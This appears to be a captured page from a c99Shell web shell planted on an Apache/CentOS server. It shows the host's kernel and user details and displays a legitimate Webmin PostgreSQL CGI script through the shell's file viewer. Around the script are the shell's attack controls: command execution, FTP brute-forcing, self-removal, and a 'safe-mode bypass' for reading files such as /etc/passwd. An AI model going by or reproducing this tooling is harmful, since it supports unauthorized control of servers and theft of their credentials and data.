!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postgresql/   drwxr-xr-x
Free 50.93 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_grant.cgi (2.77 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_grant.cgi
# Display a form for editing or creating a grant

require './postgresql-lib.pl';
&ReadParse();
$access{'users'} || &error($text{'grant_ecannot'});
&ui_print_header(undef, $text{'grant_edit'}, "");
if (&supports_schemas($in{'db'})) {
    $s = &execute_sql_safe($in{'db'}, 'select relname, relacl, nspname from pg_class, pg_namespace where relnamespace = pg_namespace.oid and (relkind = \'r\' OR relkind = \'S\') and relname !~ \'^pg_\' order by relname');
    }
else {
    $s = &execute_sql_safe($in{'db'}, 'select relname, relacl, \'public\' from pg_class where (relkind = \'r\' OR relkind = \'S\') and relname !~ \'^pg_\' order by relname');
    }
foreach $g (@{$s->{'data'}}) {
    if ($g->[0] eq $in{'table'} &&
        $g->[2] eq $in{'ns'}) {
        $g->[1] =~ s/^\{//; $g->[1] =~ s/\}$//;
        @grant = map { /^"(.*)=(.*)"$/ || /^(.*)=(.*)$/; [ $1, $2 ] }
                 split(/,/, $g->[1]);
        }
    }

# Start of form block
print &ui_form_start("save_grant.cgi", "post");
print &ui_hidden("db", $in{'db'});
print &ui_hidden("table", $in{'table'});
print &ui_hidden("ns", $in{'ns'});
print &ui_hidden("type", $in{'type'});
print &ui_hidden("search", $in{'search'});
print &ui_table_start($text{'grant_header'}, undef, 2);

# Database name
print &ui_table_row($text{'grant_db'}, "<tt>$in{'db'}</tt>");

# Schema name
print &ui_table_row($text{'grant_ns'}, "<tt>$in{'ns'}</tt>");

# Object name
print &ui_table_row($text{"grant_$in{'type'}"}, "<tt>$in{'table'}</tt>");

# Get users and groups for permissions table
$u = &execute_sql_safe($config{'basedb'}, "select usename from pg_shadow");
@users = map { $_->[0] } @{$u->{'data'}};

$r = &execute_sql_safe($config{'basedb'}, "select groname from pg_group");
@groups = map { $_->[0] } @{$r->{'data'}};

# Table of users / groups and permissions
$i = 0;
@table = ( );
foreach $g (@grant, [ undef, undef ]) {
    # User / group selector
    local @row;
    push(@row, &ui_select("user_$i", 
            !defined($g->[0]) ? "" :
            $g->[0] eq '' ? "public" : $g->[0],
            [ [ '', '&nbsp;' ],
              [ 'public', $text{'grant_public'} ],
              (map { [ "group $_", &text('grant_group', $_) ] }
                   @groups),
              (@users) ]));

    # Permissions
    ($acl = $g->[1]) =~ s/\/.*//g;
    $cbs = "";
    foreach $p ( [ 'SELECT', 'r' ], [ 'UPDATE', 'w' ],
             [ 'INSERT', 'a' ], [ 'DELETE', 'd' ],
             [ 'RULE', 'R' ], [ 'REFERENCES', 'x' ],
             [ 'TRIGGER', 't' ] ) {
        $cbs .= &ui_checkbox("what_$i", $p->[0], $p->[0],
                     $acl =~ /$p->[1]/)."\n";
        }
    push(@row, $cbs);
    push(@table, \@row);
    $i++;
    }
print &ui_table_row($text{'grant_users'},
    &ui_columns_table([ $text{'grant_user'}, $text{'grant_what'} ],
              undef,
              \@table));

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'save'} ] ]);

&ui_print_footer("list_grants.cgi?search=".&urlize($in{'search'}),
         $text{'grant_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0255 ]--